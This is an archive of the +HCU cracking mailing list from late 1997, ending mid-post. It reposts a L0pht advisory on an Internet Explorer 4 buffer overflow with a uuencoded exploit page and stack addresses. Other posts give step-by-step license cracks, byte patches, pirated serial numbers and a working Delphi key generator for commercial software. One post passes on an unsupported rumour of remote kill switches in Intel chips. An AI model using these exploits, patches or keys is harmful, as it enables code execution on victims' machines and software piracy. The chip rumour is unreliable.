======================================================== +HCU Maillist Issue: 61 11/17/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: OrcFinder(TM) #2 Subject: SoftIce Basics #3 Subject: a little challenge #4 Subject: a little long but very nice ARTICLES: -----#1------------------------------------------------- Subject: OrcFinder(TM) Regarding the ORC riddle: If non HCU-ers find the answer to the riddle, fine. If HCU-ers find the answer (or have found the answer) it should be mentioned to HCU-ers alone if the answer reveals his true identity. He has been careful to protect the identities of his HCU-ers, and that same respect should be used in return. Just my 2 cents. +gthorne -----#2------------------------------------------------- Subject: SoftIce Basics Hi all Am I just stupid or is it impossible to get WIce to write to a file. Say for example I want a screen of SoftIce to be written to a text file so I can examine it later. Can this be done? Any case, I realy enjoy all the help and info on here. Tnx to everyone who take time putting there thoughts to paper so to speak. Bye GlorFindeL ______________________________________________________ Get Your Private, Free Email at ********************** -----#3------------------------------------------------- Subject: a little challenge Hello all, there's a funny little program at ************************************* it's a diet program. Besides that, what's funny is that I can never manage to BPX into the exe, but only into vbrun300.dll or GDI, or USER, etc. Now, I am not *that* experienced with cracking, but I found this very strange. I trace and trace and trace, and it never shows up into the main exe. Could someone take a look? Maybe it's something very simple, but perhaps it could result in a nice 'lesson' to us all. WAFNA of FCA -----#4------------------------------------------------- Subject: a little long but very nice Hello all, pls read.... Document: L0pht Security Advisory URL Origin: ******************************** Release Date: November 1st, 1997 Application: Microsoft Internet Explorer 4.0 Suite Severity: Viewing remote HTML content can execute arbitrary native code Author: **************** Operating Sys: Windows 95 ------------------------------------------------------------------------------- ======== Scenario ======== The Microsoft Internet Explorer 4.0 Suite, including all programs supplied with it that read and/or process HTML from either local machines, intranet machines, or remote internet machines are subject to a buffer overflow in the HTML decoding process. The buffer overflow can cause the application to page fault, or in the worst case, execute arbitrary precompiled native code. ======= Example ======= 1. Copy the supplied HTML file(s) into a location that is accessible via the target application. 2. Point to it. Look at it. 3. Click on the link. (or let someone click it for you) 4. Become aware of what happens to your machine. 5. Freak out and beg Microsoft to make the bad man stop. ================= Technical Details ================= The problem here lies in the deciphering of the URL line format itself. The base HTML library that is used by the Internet Explorer 4.0 Suite and the following programs are vulnerable: - Outlook Express (both mail and news) - Windows Explorer - Internet Explorer (different than regular explorer, really) This problem, because it stems from a programming flaw in the HTML decoding system, is unaffected by the Explorer "Security Zones" feature. In other words, if you turn on the highest security level for the zone from where the exploit HTML is being viewed, you are still vulnerable. The critical problem here is a buffer overflow in the parsing of a particular new type of URL protocol. The "res://" type of URL is meant to allow access to a local resource embedded in a local DLL file. This is useful for archiving entire websites into a DLL and is not, in its truest concept, a security flaw. For example, to read something out of the IE4.0 Tour (stored in a DLL) try the following URL: res://ie4tour.dll/page1-6.htm The buffer overflow is on the actual filename specified. To crash your machine go ahead and try res://blahblahblah ... blahblah/ in your Internet Explorer window where the amount of 'blah' equals 265 characters. The function that goes through the filename and validates it is flawed on Windows 95. Without checking the length, the filename is uppercased, concatenated with '.DLL' if it isn't there already, and in the process, copied into a fixed size buffer. ======== Solution ======== Currently, there is no solution available for this flaw. You can't set any Internet Explorer options to avoid it, and you are not protected by any level of zone security. Simply don't surf the web, read email or view net news using Internet Explorer 4.0 until Microsoft puts up a hotfix. ============ Exploit Code ============ Here we go... When constructing the exploit we want to try something useful. Lets's start with appending text of your choice to AUTOEXEC.BAT... (note that running native code lets you do pretty much anything you want) Note that the location of the exploit string in the stack is very important and it varies from target application to target application. Constructing the exploit string: Figure out stack location for exploit code... App Loc Internet Explorer 0x0057C144 Windows Explorer 0x0088A0F4 ... Yeah, I know that those locations have null bytes in them and you can't put those (or lowercase letters, or CR/LF or 0x07 or anything like that) in the exploit string... but we'll let microsoft fix that for us. Step thru the process to see IE add that extra null character for you. Will they ever cease to amaze... Put together what you wanna do, tack on the necessary jump addresses and all that. That's it. And now, UUENCODED to preserve freshness: ************************************************************************* * MAKE SURE YOU RUN THIS EXPLOIT WITH __INTERNET__ EXPLORER, _NOT_ * * REGULAR OL' WINDOWS EXPLORER. (put it on a website and download it or * * click on the IE desktop icon (run iexplore.exe) and type in the name * * of the file into the URL line) IT WON'T WORK OTHERWISE!!!! * * (though it could be made to do so) * ************************************************************************* ----====/ SNIP section 1 of uuencode 5.20 of file infect.htm by R.E.M. begin 644 infect.htm ************************************************************* M/"]T:71L93X-"CPO:&5A9#X-"CQB;V1Y(&)G8V]L;W(](T9&1D9&1B!T97AT ************************************************************* ************************************************************* ************************************************************* ************************************************************* ************************************************************* M,]NS.5.[#-+G$('K$!"0$%-0N[#*^;__TX/$#)"0D)"[SX#YO__3D)"0N["O ************************************************************* ************************************************************* ************************************************************* M"B(^#0H\9F]N="!F86-E/2)7:6YG9&EN9W,B('-I>F4]*S8^_SPO9F]N=#X\ ************************************************************* ************************************************************* ->3X-"CPO:'1M;#X-"CX- ` end sum -r/size 62455/917 section (from "begin" to "end") sum -r/size 5779/643 entire input file /====---- SNIP A haiku: Microsoft IE Is there no security? Not if you ask me. **************** (11/1/97) ------------------------------------------------------------------------------- For more L0pht (that's L - zero - P - H - T) advisories check out: ******************************** =====End of Issue 61==================================== ======================================================== +HCU Maillist Issue: 62 11/18/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: WeightCm #2 Subject: Likse 1.72 #3 Subject: Winice Text File saving. #4 Subject: My first crack #5 Subject: ie4 patching ARTICLES: -----#1------------------------------------------------- Subject: WeightCm WAFNA; Here are my notes on WeightCM. Go to register screen, enter 123123 ctrl-d into Soft-Ice s ds:0 lffffffff "123123" bpr ds:xxxxxxxx ds:xxxxxxxx+6 rw ctrl-d back to program and press enter When Soft-Ice breaks: ds:si <---= your input es:di <---= where it will go bpr es:di es:di+6 rw S-I breaks on repz scansb <--- counts input S-I breaks on repz movsw <--- program stuff S-I breaks on repz movsw <--- the spot at the spot: (vbrun300(31) CS:958F) d es:di <---= your input scan up the data window, real PW is right on top of your input TWICE! Now just shut down the program, re-start and enter the REAL PW number. Hackmore -----#2------------------------------------------------- Subject: Likse 1.72 Hi all! I wonder if anyone of you have met this Likse offline browser and could crack or even register it with a valid key you got from the author. Yesterday evening I tried to crack it, but got nowhere, so I thought I ask if anyone has already worked with this. Annoying features: - nagscreen, - you cannot export the htm file to text, the register info says you can export only the first 50 lines, but actually the only thing I could export is the register info file :( - if you search for a string in files only the first five hit is displayed (even this number is not correct I could see only four hits) The reginfo says everything can be unlocked with a correct user key. Ok, I said lets do some work, deadlisting, looking for the bad guy string I have found the validation rutin. Patched the jump after it "Thank you for registration..blahbla" Name and ID written into ini file. Restart program registration rutin called at the begining to check for Name and ID read from the file. Patched the jump there too, program goes on happily, the nag screen gone, but ...oops you still can not export and the search is still limited. Shit, this will be longer than I sought :) Ok, lets dive deeper into the key generation rutin (man, I hate to do this) probably some flags are set there. After long and unsuccessful Iceing I got really bored with it. The rutin is long, complex, does a lot of things which has nothing to do with key validation (at least I think), it uses push address, ret instead of jumps etc. It might be intentionally complicated but I think its just a badly written spagetti code. Ok, I will not get a valid key soon lets give it up and check out Oscar. It has four keys for 1.x ver, I punch them in. The same shit: "Thanks for registering..", nagscreen goes, but all the limitations remain. Ok lets attack from the other direction, I pinpoint the rutins dealing with the limited functions to look for a flag checking before they execute the bad guy version etc. Not even a single conditional jump in them, the limit seems to be hard coded, and no obvious way to unlock them with a password. It seems to me that the author had a first version with the ability to unlock with a key, but later due to the appearance of valid keys on the net he just went for a crippled version. Letting the whole bazar of registration in it, is a nice touch, certainly lets the cracker work a lot for nothing. On the other hand he might be just lazy to rewrite the reginfo file, considering that the current limitations are not exactly whats written in the info. So my problem is: can this program be unlocked with a certain key (meaning that I have been fooled completely by the protection) or the guy says to the normal customers when they call: Ohh, no... the registration is not working like that, anymore. We will ship you the complete version instead of the key as soon as possible. Have a nice day... :) Bye Zer0+ PS: Of course I will try to patch the limited functions, but thats a totally different ball game. -----#3------------------------------------------------- Subject: Winice Text File saving. Hi GlorFindeL, >Subject: SoftIce Basics >Hi all >Am I just stupid or is it impossible to get WIce to write to a file. Say >for example I want a screen of SoftIce to be written to a text file so You can't 'save' the softice's screen itself (you can print it), but the softice's history. First, fire symbol loader and go to softice initialization settings. Put a history buffer size more of 0Ko, obviously :-) (default is 256, not enough for big listing). Second, fire winice / ntice. Put your breakpoints and all to arrive at the wanted code. Disassemble with for example, U CS:EIP L 1000 Third, CTRL-D immediately to return to W95/NT, fire again symbol loader and choose File/Save Softice History As... And the saved file contains your code, winice loading, all you type (even if you're tracing WITHOUT code window on), etc... Cya. FootSteps. -----#4------------------------------------------------- Subject: My first crack Hi, All! Well, at last :-))) I don't know if you remember some messages I sent about cracking apps using VCL. VCL stands for "visual component library", a library used by recent Borland visual languages as Delphi and BC++ Builder. This kind of environments use a proprietary format of resources, that appear as "RCDATA" when listed by RWS.=20 This resources contain "forms". Forms, in Delphi jargon are the windows of the program, and all the info about their design are stored there. When a Delphi app is starting, the initialization code creates the forms, loading the required information from the resources. Sometimes this loading is deferred for forms not used very often, that are created and destroyed as needed. This system is the best and the worse of Delphi. It allows a very fast way of programming but, for big apps, it can slow down the loading time. The really interesting part of this information is that the address of the routines -called in response to user actions over the elements of the form- are binded at run time by name. So knowing theese names we can find the addresses. If you have cracked Delphi apps, you surely have experienced a long chain of calls inside the library, from the breakpoints on the API calls to the "do something" code.=20 I hoped that those addresses could help pinpointing the code. +ReZiDeNt suggested me to test this method against a "real world" program: Flexed, an HTML editor written in Delphi and I installed it. But the weeks passed and I hadn't time to work on it. When I started it yesterday I found a nasty "Your evaluation period has expired" :-( I had convinced an old Windos programmer to join me making a new tool for spying all the information about Delphi and BC++B forms. I'm going to publish it on the web, but it needs some final touchs, so please wait some days. BTW, I'm going to be netless for a few days, so be patient if I can't reply any question about this as quickly as I would like. I used this tool to obtain the information about "TSplashForm" and this is what I got: ------------------------------- object SplashForm: TSplashForm Left =3D 240 Top =3D 150 ... // lot of blahblahblah here ... TabOrder =3D 0 end object RegButton: TButton Left =3D 200 Top =3D 176 Width =3D 97 Height =3D 25 Caption =3D 'Register' TabOrder =3D 1 OnClick =3D RegButtonClick end end --------------------- (you can also use RWS or simply hexedit it, but converted to text is clearer) Well. It seems to be here, near the end: OnClick =3D RegButtonClick This is what happens when the user presses the button with the caption "Register". Using Hex Workshop, I looked for "RegButtonClick" and I found it twice. The second is the resource itself, the first is within an address table: 000A4990 ____ ____ ____ BC57 4A00 0E52 6567 4275 ______.WJ..RegBu 000A49A0 7474 6F6E 436C 6963 6B__ ____ ____ ____ ttonClick_______ Now look at the magic numbers before the name. There is an 0E byte indicating the length of "RegButtonClick" (14 characters) and even before, an address: 004ABC57. WDasm seems to think that this is a too long file and deserves unassembling it correctly but with Softice we can bpx this and... right! it stops at this point just when we push the button. Tracing some instruction forward you'll find an "standard stack frame" in 44ECC8. From this point, there are some calls to show a dialog asking for the user name and a register key.=20 You can enter the name you choose, and anything as the key, after BPXing 44ED69. Here, a call to a routine compares two strings. D EDX will show the fake key you entered and D EAX, the correct calculated key.=20 Err... I'm still learning to use SoftIce so I was tempted to stop here. But, no!! a little cocktail with spanish whisky. I don't know if it's more similar to vodka-martini or Wafna's kerosene... but it worked :*) The encrytion algorithm is in 0044E714, called a little before than the str-comp. Well, there's a lot of additional details I needed to handle, but I'm sure you are not very interested in them right now O:-) I'll write an essay with everything and send it to Fravia... maybe the protection scheme is not very interesting but I think the *cracking scheme* is. I thought it would be nice to write the key generator in Delphi itself. But don't worry, it's less than 6kb. If you have Delphi 32bits, save this as HCUFE32.dpr, load and run. If you want to translate it to other language, take a look at 00402B94, the source of random number generator. The "seed" must be initialized to 0EEEEH. ------------------------------------ program HCUFE32; {$APPTYPE CONSOLE} uses SysUtils; function Convert( sUserName: string ): string; var n: Integer; IterateRandom: Integer; Calculated: Integer; Selected: Integer; sFiltered: string; b1,b2: Byte; begin sUserName :=3D UpperCase( sUserName ); sFiltered :=3D ''; for n :=3D 1 to Length( sUserName ) do begin b1 :=3D Ord( sUserName[ n ] ) + $d0; b2 :=3D b1 + 239; if ( b1 < $a ) or ( b2 < $1a ) then sFiltered :=3D sFiltered + sUserName[ n ]; end; Result :=3D ''; if sFiltered =3D '' then Exit; RandSeed :=3D $EEEE; for n :=3D 1 to 12 do begin Selected :=3D Ord( sFiltered[ Succ( Random( Length( sFiltered ) ) ) ] ); for IterateRandom :=3D 1 to Selected do Calculated :=3D Random( 10 ); Result :=3D Result + IntToStr( Calculated ); end; end; var s: string; begin Writeln; Write( 'User name: ' ); Readln( s ); s :=3D Convert( s ); if s =3D '' then Writeln( 'Incorrect user name... sorry, try again O:-)' ) else Writeln( 'Your user key is ' + s + ' courtesy of +HCU.' ); Write( 'Press RETURN to return...' ); Readln end. ----------------------------------------------------------------- Thanks to +ReZiDeNt for his help and encouragement ;) greetings +trurl P.D. I've seen a message here about MultiEdit. This is not a Delphi app. Maybe some DLLs are written with Delphi, but it doesn't use VCL. As you have seen just a little above, it's possible to write apps or DLLs in Delphi without using VCL at all. -----#5------------------------------------------------- Subject: ie4 patching The bug in IE (apparently a more general bug than that) is supposedly fixed whith the patch below. Here is a copy of the message from the bugtraq mailing list. I do not have IE4, nor do I care to install it for a long time, so test this at your own risk. +gthorne --- message here --- The patch will be to the mshtml control which is the core of Internet Explorer and is what the other applications mentioned by l0pht will be using. Hence the patch to IE will fix the other apps. John Wiltshire > -----Original Message----- > From: Richard Trott ****************************** > Sent: Friday, November 14, 1997 5:39 AM > To: ******************** > Subject: IE4.0 patch > > Microsoft released a patch for the recently-reported (via l0pht--see > ******************************** if you missed it on bugtraq) buffer > overflow in Win95 with regard to res:// type URLs. > > Does anyone know if the patch > ************************************************************** to get > it) > actually fixes Win95, or if it's just an IE patch? The l0pht advisory > indicated that other apps were vulnerable because the problem was with > Win95, not IE. (Easy, if not-so-thorough, way to test: use Outlook > Express (or Windows Explorer) to view a bogus res:// URL of longer > than > 256 characters and watch it crash Outlook Express (or Windows > Explorer). > Install patch above. Try again. Does it still crash? I don't have a > Win95 machine at my disposal to test this with...) > > Richard Trott > *********************** =====End of Issue 62==================================== ======================================================== +HCU Maillist Issue: 63 11/19/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: Solving +Orc riddle? #2 Subject: chez.com #3 Subject: Likse 1.72 ARTICLES: -----#1------------------------------------------------- Subject: Solving +Orc riddle? Hail +All: More than anything else, the honor to meet +Orc and all the other +personalities holds more appeal than chasing a cyberspace riddle. What if we held a year 2000 convention (kind of like a class reunion) with the guests of honor being the +Master and his famous +three disciples of fravia+, +gthorne, and +Sync? Would anyone show up for the occasion? Each name you come across in this ML and the essay submissions is a riddle. We could solve all the riddles and the personality behind the masks at one time. Think about it Hackmore. Why did you abstain from voting on your own survey? Rather than buy a software, would you spend the money on a plane ticket to meet +Orc if it was possible? wlc -----#2------------------------------------------------- Subject: chez.com Hello all, remember ************* The only place where you get 10MB of free web space and an e-mail address which you can access via POP3 protocol? Well, they are now limiting new users to French people, ie, you need to have an e-mail address which ends in .fr Since most people on the +HCU mail-list seem to be in Europe, does anyone here have a .fr address? (it would only be used to receive a single e-mail from chez.com; then you would reply for me, and that would validate my address). TIA, WAFNA -----#3------------------------------------------------- Subject: Likse 1.72 Likse V1.72 (c) Faico 16/32 bits VERSION WORKING REG ******************** NAME:CKL!1997 SN:2909679-2590 SINGLE LIC SN:2909679-159 SITE LIC SN:2909679-4694 ROYALTY FREE SN:2909679-4210 LICENSE DEEP TRACE NEEDED,CATCH HMEMCPY MAIN PROT SCHEM IS A CMP EAX,[EBP-14] WHER EAX IS HEXED OF FIRST PART OF THE SN AND EBP-14 THE HEXED OF FAKE IT'S LIKE: CMP EAX,[EBP-14] SETZ BL .... IF FIRST SN PART OK CONTINUE AND AFTER A CALL THE SECOND TEST AS CMP EAX,[EBP-18] WITH HEXED OF SECOND PART IF WRONG TEST REJUMP UP AND TEST SAME IF SINGLE,SITE,ROYALTY,LIC 4X EACH HEXED IN EAX TIME LOOSE TO GENERATE ALL LICENSED VERSION done in 5 minutes ______________________________________________________ Get Your Private, Free Email at ********************** =====End of Issue 63==================================== ======================================================== +HCU Maillist Issue: 64 11/20/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: 2k Party and FTP #2 Subject: Yet another site-grabber #3 Subject: pentium bug #4 Subject: possible sighting of unusual behavoiur by (possibly) Likse? ;-) ARTICLES: -----#1------------------------------------------------- Subject: 2k Party and FTP Fravia and myself would probably go for the idea of a party - we both love a good beer :) +ORC and our original HCU counterpart(s) are always an enigma however. I think that even if we did figure out who +ORC is, and even if he met Fravia or myself, it would be another ice age before we could get him to show up. I suppose any of you who tried the new ftp site (listed as FTP2 below - it was hacked by someone with the fun litle f00f bug and has been redone. The address below works, and when i get a chance I will update my pages to reflect this. For fun, I have set up an incoming directory there for you guys. Don't overload it, we only have so much space, but when you guys discuss an important software tool here, feel free to up it there if you lack someplace to put things. I reserve the right to move things around (or make space if the site gets full since i am not the only person with access by removing a few things) Take care +gthorne /*****************************************************\ Greythorne The Technomancer WebSite: ******************************* (AKA:) ************************************ (IP:) **************************** Gateway: ************************************* Old Mirror: ****************************** FTP1: ****************************************** FTP2: ******************************************* \*****************************************************/ -----#2------------------------------------------------- Subject: Yet another site-grabber Hi! Iternet Marauder is another program to download entire sites. It's not very lengthy (750kb unzipped). Speed is reasonable. Easy to use. Version 1.4 is downloadable at any simtelnet mirror: ....simtelnet/win95/inet/mdr14.zip It's also unexpensive, $10... err, you can also patch at 401842, replacing: :00401842 55 push ebp :00401843 33C9 xor ecx, ecx .... simply with: :00401842 33C0 xor eax,eax=20 :00401844 C3 ret .... This also removes some limitations. bye +trurl -----#3------------------------------------------------- Subject: pentium bug Hello all, On 10 Nov 97 at 7:21, +HCU ML wrote: > #7 Subject: pentium bug > -----#7------------------------------------------------- > Subject: pentium bug > > Hi all! > > I just came across the info: > the F0, 0F, C7, C8 instruction codes freeze a pentium processor and > only the reset helps. This translates to the LOCK CMPXCHG EAX > instruction which is not a privileged instuction so you can do it in > all rings. With this you can kill a multiuser system (NT or linux) > instantly. The only way to bring it back is going to the machine and > press reset. That much about secure operation systems on a PC. BTW I > have 486 and PPro so I could not check the info. Well, allow me to introduce myself: I live in South America, where I work at an Embassy as a diplomat, and, because of that, I have contacts with lots of people in greedy govt agencies. This having been said, I should add that I am not a spy among crackers.... I began with a sinclair in 1980, moved to a Vic20 in 1982, evolved to an Apple in 1984, and went to the PC in 1987. I began using machine code on the Vic20, and I always liked it, although on the PC it seems quite strange..... Anyway, what I wanted to tell you is something I got from a source in an American agency about INTEL chips. Apparently, espc those who ended up used for defense (the source mentioned Iraq), have something inbedded in them by which they can be disabled by a certain series of variations in voltage from the power line. Not all chips have this, and this 'protection' would enable the US govt to destroy ('explode' and 'blow up' were the words used by my source) the chips in certain areas. Now, if that is true, it's awfully clever....... WAFNA -----#4------------------------------------------------- Subject: possible sighting of unusual behavoiur by (possibly) Likse? ;-) Hello +Zer0, > I wonder if anyone of you have met this Likse offline browser and > could crack or even register it with a valid key you got from the > author. Yesterday evening I tried to crack it, but got nowhere, so I > thought I ask if anyone has already worked with this. Hmm.....awhile ago I was looking for a suitable (eg crackable :-)) offline browser for a project - many that I found were simply deadware - but I found a few useful ones which seemed crackable, including Likse. Anyway, I didn't like Likse for a number of reasons, but I'm pretty sure I did crack it (I say pretty sure because I think I remember a very unusual scheme it used - at least for a Windows program - but I don't have any notes made of it, probably because I cracked it in the wee hours and was only half-awake at best :-)) - if I remember correctly, Likse actaully *patched itself* - I've not seen this behaviour before or since in a Windoze program, but I do remember thinking how unusual it was. I can't be absolutely certain it was Likse that used that, but I think it might be - so you might want to take a quick look at any suspicous file I/O routines. Cheers, +ReZiDeNt =====End of Issue 64==================================== ======================================================== +HCU Maillist Issue: 65 11/21/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: Assembly #2 Subject: Re: Likse ARTICLES: -----#1------------------------------------------------- Subject: Assembly Hello all, for those who want to read the latest on INTEL's undocumented features, check ******************************** (text only) or ****************** (with images). IMHO, that would be worth a note on Fravia's pages re protections - imagine something based on a INTEL undocumented feature, something really strange..... that would block away most crackers..... WAFNA -----#2------------------------------------------------- Subject: Re: Likse Hi all! Somebody wrote: >Likse V1.72 (c) Faico 16/32 bits VERSION WORKING REG ********************* >NAME:CKL!1997 >SN:2909679-2590 SINGLE LIC >SN:2909679-159 SITE LIC >SN:2909679-4694 ROYALTY FREE >SN:2909679-4210 LICENSE Unfortunately, these keys are not working with the Likse version I downloaded yesterday again. (Zip file 394 406 bytes, exe file 550 912 bytes. My fault that I forgot to give the exact specifications of the target previously.) So the quest is still up: Can somebody provide a working key (even obtained from the author) to unlock this version? :) I still think the author just gave up this registration thing all together. Anyway, i worked on the program yesterday and here is the fix. Elimination of the nag screen: :00455FC3 call 00455B30 /This rutin checks the key :00455FC8 mov ebx, eax :00455FCA test ebx, ebx :00455FCC jl 00456126 /Nuke this jump This patch makes the program belive it has a valid REGNAME and REGID key in the [APPINFO] section of the Lkaccess.ini file even when there is no such section at all. (you can make it if you want with your name. :) Elimination of the 50 line limit from the export text function: Piece of cake! :0045E73C cmp si, 0032 :0045E740 jbe 0045E746 /Nuke this with NOP, INC ESI :0045E742 mov si, 0032 / NOP, INC ESI, NOP, NOP :0045E746 test si, si We have to increment ESI by 2 otherwise the last two line of the htm file is not purged from the html tags. (Maybe a bug? Who knows? We fix it anyway :) The program writes at the begining of every output text file that only the first 50 lines are converted. This should be left out when it writes the text to the file (tempfile.txt). One way to do this is to jump over all the rutins which puts the bad guy text to the output buffer. This can be achived by inseting a JUMP 45E730 instruction at position 45E6F0. The only inconvenience is that the name of the file we convert is inserted at the begining of the output file. Elimination of the max 5 displayed search result limit: The value 5 is at [464A90] and checked here: :004600A6 cmp bx, word ptr [00464A90] :004600AD jbe 004600B6 /make this to JMP :004600AF mov bx, word ptr [00464A90] There is also some text that only five results are displayed which is not true anymore :) So lets get rid of it by inserting a JMP 460080 to position 45FFC9 which just jumps all over the bad guy string construction rutins. With this modifications the program is fully functional. On the other hand if somebody knows a better offline browser (I think Rezident said he has one) please let me know. Thanks Zer0+ =====End of Issue 65==================================== ======================================================== +HCU Maillist Issue: 66 11/22/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: frmspy ARTICLES: -----#1------------------------------------------------- Subject: frmspy Hi All! I've used the FTP site +gthorne offered (thanks, +gthorne! :)) to upload my little tool frmspy. If he doesn't decide to move it around: *************************************************** The filename is frmspy.zip ~137kb. Notes:=20 The code is taken from a more complete utility for Delphi programmers that some friends are working on.=20 The complete tool is still under developement. When done, I'll post the address of the Delphi programming page where it's going to be published. I've limited the funcionality to just the interesting part (for us). Other limitations come from the fact that it's incomplete O:) -It's a 32 bits app.=20 -Only works with 32 bits exes (Delphi 2+ and BC++Builder). If you try to load a 16 bits program, it'll complain -"Not a PE file". -Some RCDATA resources might not be forms. In this case an "Incorrect format" message appears.=20 Tip: It can also manage DLLs. Be aware that, for Delphi3 programs, it's possible to find some DLLs with a different file extensions (maybe DPL). ------------------ +ZERO, where did you download Likse? greetings +trurl =====End of Issue 66==================================== =====Sorry, no #67 available!=========================== ======================================================== +HCU Maillist Issue: 68 11/24/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: Re: frmspy and IRC war #2 Subject: Attn AZ111 #3 Subject: An alternative to Likse #4 Subject: Likse #5 Subject: stupidest protection of all times ARTICLES: -----#1------------------------------------------------- Subject: Re: frmspy and IRC war > > I've used the FTP site +gthorne offered (thanks, +gthorne! :)) to > upload my little tool frmspy. If he doesn't decide to move it around: > > *************************************************** > > The filename is frmspy.zip ~137kb. > .... > +trurl > You are welcome :) notice also that the directories above contain the full install of tasm 5 (and of course the full ida that i just like having around) - and hopefully more in the future Feel free to make any subdirectories in the incoming directory, if they are intelligently named, i may just keep the same dir names and move them upward to the main .cracking tree I will be gone for a week (holiday and such) so I wont be able to look out for hundred meg overloaded uploads (eek!) On a separate note, many of you have noticed that rIDDLER has banned me from #cracking (as well as resorting to irc attack programs to lock up my pc on occasion, and regularly knock me offline) He is also on as Jami Quai It happened because one day he was bashing Fravia, Me and +ORC (again - I hear it has happened on occasion before) and he asked me my opinion on tutorials. I told him they were an important part of the learning process... examples in texts have for thousands of years been an invaluable resource in schools. Where would we be without the written word? Dark ages I tell you. Apparently he didn't like the fact that I wasn't going to lose easily my argument because it was different from his. I feel it is a shame that someone I had once respected has to resort to childish bully tactics to enforce an opinion, rather than have healthy opinion diffences like we all do from time to time. I just thought I would let you know before it trickled down the grapevine. It is easier answering many questions pro-actively rather than re-explaining it each time someone finds out. Take care all, I have a week of holiday planned where I can leave these minor irritations behind. See you when I get back. +gthorne /*****************************************************\ Greythorne The Technomancer WebSite: ******************************* (AKA:) ************************************ (IP:) **************************** Gateway: ************************************* Old Mirror: ****************************** FTP1: ****************************************** FTP2: ******************************************* \*****************************************************/ -----#2------------------------------------------------- Subject: Attn AZ111 Regarding truetype fonts ------------------------ Documentation of the .ttf format can be obtained from ******************************************************** For all file format questions, I have found Wotsits File Format at ****************************** to be an excellent resource. Regarding the CreateFont functions... CreateFont defines a "logical font structure" on-the-fly, while CreateFontIndirect relies on a pre-maed font structure (i.e., a resource). GetFontData obtains Font Data (presumably a "logical font structure", though one can never be sure with M$oft) from an existing .ttf font. The Enum functions obtain data about a font (per the .ttf file format, presumably a "logical font structure", again) and pass it to a function. Further information can be obtained from the win32 API ref--if you do not have it, get a real compiler ;) or go to **************************************************************** and choose link #3. Note that appilcations use a variety of ways to obtain fonts, including GetStockObject()--commonly used in everything but word processors (has courier, system, and Times New Roman avail). _m ______________________________________________________ Get Your Private, Free Email at ********************** -----#3------------------------------------------------- Subject: An alternative to Likse Hello +Zer0, > I worked on the Likse which I have downloaded from the > ************* Likse download page. The link was called > server2 and pointed to > ****************************************************** The offline browser I found (the one I liked best) is called 'HMView 1.0' - I can't remember where I found it bu if you search you'll probably find it easily enough. I made a serial number for it: Name: User Company: None Code: NBPFQSLIQQWO Cya, +ReZiDeNt -----#4------------------------------------------------- Subject: Likse Likse about i've tried the previous submited nfo on reg about this app was: ******************** NAME:CKL!1997 SN:2909679-2590 SINGLE LIC SN:2909679-159 SITE LIC SN:2909679-4694 ROYALTY FREE SN:2909679-4210 LICENSE the LICENSE worked fine,but if work'nt for you,it's a system dependant tool,anyway after the valid reg (without any patch) the lkacess.ini: [APPINFO] REGNAME=CKL!1997 REGID=2909679-4210 [Advance] All_Enabled=1 I've no time to look further where the possible check of machine license is but the :name:CKL!1997 / SN=:2909679-4210 LICENSE worked fine on the gived links of previous issue. -----#5------------------------------------------------- Subject: stupidest protection of all times now hear this..... there is an excellent program called HEADLINER, which retrieves the headlines of ANY newspaper/magazine webpage you specify and shows it on your screen as a ticker of any size, even a small one in the title bar of the active windows. the free version is at ****************************************** the only limitation is that you can only get the news from the webpages they set in memory. However, they left on that ftp the PRO version completely unlocked! (and some other proggies which I am d/loading right now to see what they are) - in the pro version, you can specify virtually ANY web page and get it's 'headlines' (including Fravia's...) So, if you want to grab your free version of headliner pro, just FTP to ***************************** - but there's a twitch: you can't get the list of the files in the directory by using a normal ftp client, only w/ Netscape or with a unix shell. Isn't that awfully stupid? Anyway, the program is excellent - no ADS (like Pointcast and other newstickers), does not create a ticker reducing your desktop space, but uses the TITLE BAR of your open windows (there is a ticker and screensaver option, if you really want them). So have fun..... WAFNA of FCA =====End of Issue 68==================================== ======================================================== +HCU Maillist Issue: 69 11/25/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: IRC wars, sad lack of respect for the importance of tutorials :- ARTICLES: -----#1------------------------------------------------- Subject: IRC wars, sad lack of respect for the importance of tutorials :- Hi +gthorne, > I feel it is a shame that someone I had once respected has to resort > to childish bully tactics to enforce an opinion, rather than have > healthy opinion diffences like we all do from time to time. I agree with you 100%!!!! Actually, I avoid IRC for this reason (I find it often degenerates into 'war') - but without cracking tutorials most of us would have no way of learning about this subject! Keep up the good work! +ReZiDeNt =====End of Issue 69==================================== ======================================================== +HCU Maillist Issue: 70 11/26/1997 -------------------------------------------------------- Send Articles To:......................... ************* Info, Help, Unsubscription, etc:....... **************** ======================================================== CONTENTS: #1 Subject: Re: Likse again #2 Subject: Newer but still simple. #3 Subject: (not quite cracking) #4 Subject: New main site #5 Subject: Newer but still simple ARTICLES: -----#1------------------------------------------------- Subject: Re: Likse again Hi! >the LICENSE worked fine,but if work'nt for you,it's a system dependant >tool,anyway after the valid reg (without any patch) the >lkacess.ini: >[APPINFO] >REGNAME=CKL!1997 >REGID=2909679-4210 > >[Advance] >All_Enabled=1 Yes it does these things for me too, but the 50 line limit of text exporting and the limit of displaying only 5 hits in the search remains. >I've no time to look further where the possible check of machine license >is but the :name:CKL!1997 / SN=:2909679-4210 LICENSE >worked fine on the gived links of previous issue. When did you downloaded your program from that web site? Or if its not a problem for you, you can send your version as an email attachment to the ********************** I can check it out. If you dont want to do that (having a slow modem etc.) than just let's drop the whole issue this program is overcracked anyway :) bye Zer0+ -----#2------------------------------------------------- Subject: Newer but still simple. Hail +ReZideNt: Checked for HMView. Found one at **************** by Bersoft called HMView v1.52 zipped sized 537,900 bytes. Must be an update since it used 